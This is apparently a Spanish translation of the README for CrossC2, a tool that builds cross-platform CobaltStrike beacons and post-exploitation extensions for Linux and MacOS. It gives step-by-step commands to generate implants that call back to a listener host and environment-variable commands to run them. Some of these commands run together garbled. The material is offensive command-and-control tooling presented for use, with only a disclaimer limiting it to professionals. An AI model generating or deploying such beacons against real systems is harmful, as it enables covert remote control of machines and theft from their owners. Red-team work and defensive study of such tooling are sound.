
generar el payload multiplataforma de CobaltStrike
README | Documentación en chino | README_FULL | Documentación completa en chino
Compatibilidad con la evaluación de seguridad de CobaltStrike en otras plataformas (Linux/MacOS/...), e incluye el soporte de desarrollo del módulo de post-explotación de Unix.

- Descargar
Descargue CrossC2.cna, genCrossC2, CrossC2Kit, modifique la configuración de CrossC2.cna
- Crear listener y copiar clave
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys del directorio del teamserver a local
- Extensión de funciones
CrossC2Kit_Loader.cna, incluyendo la carga en memoria y otras funcionescs4.x, faltan la gestión de archivos y la función de lista de procesos; debe usar este Loader para reiniciar
- Generar beacon
Use la función de GUI proporcionada por cli o cna para generar beacon por defecto
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
ejemplo:
1. lea BEACON_KEY de la ruta actual y genere BEACON del protocolo de tráfico C2Profile predeterminado
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. especifique el BEACON de la biblioteca dinámica de protocolo personalizado
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. especifique el C2Profile que necesita ser analizado automáticamente
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
En la documentación se puede encontrar una configuración más avanzada: 📄Referencia
- Ejecutar beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
CrossC2Kit es una expansión de infiltración en la plataforma Unix derivada de CrossC2. Utiliza el motor de script de código abierto Aggressor Script. Se puede usar para crear automatización que simule el proceso de operación del Red Team y expandir el cliente CobaltStrike.
CrossC2Kit hereda las funcionalidades originales de CobaltStrike, por lo que la gramática de desarrollo y escritura aún se refiere a la documentación oficial: https://trial.cobaltstrike.com/aggressor-script/index.html
Pero tiene algunas extensiones de API sobre CrossC2 para controlar el beacon de la plataforma Unix
API: 📄Referencia
Demo: 
Solo para uso interno por parte de empresas y organizaciones. Este marco tiene un cierto grado de inestabilidad. No se permite su uso por parte de no profesionales. Nadie debe usarlo con fines ilegales o lucrativos. Además, está prohibido publicar versiones modificadas no autorizadas, o de lo contrario se asumirán responsabilidades legales.
Gracias a @Emma por el logotipo diseñado para CrossC2, que está diseñado en el estilo de las series Armitage y CobaltStrike
| CS3.14 (correcciones de errores) | CS4.0 | CS4.X (4.1~4.8) |
|---|
| Rama master | ✅ | ||
| Rama cs4.0 | ✅ | ||
| Rama cs4.1 | ✅ | ||
| Página de lanzamiento <= v2.1 | ✅ | ||
| Página de lanzamiento >= v2.2 | ✅ |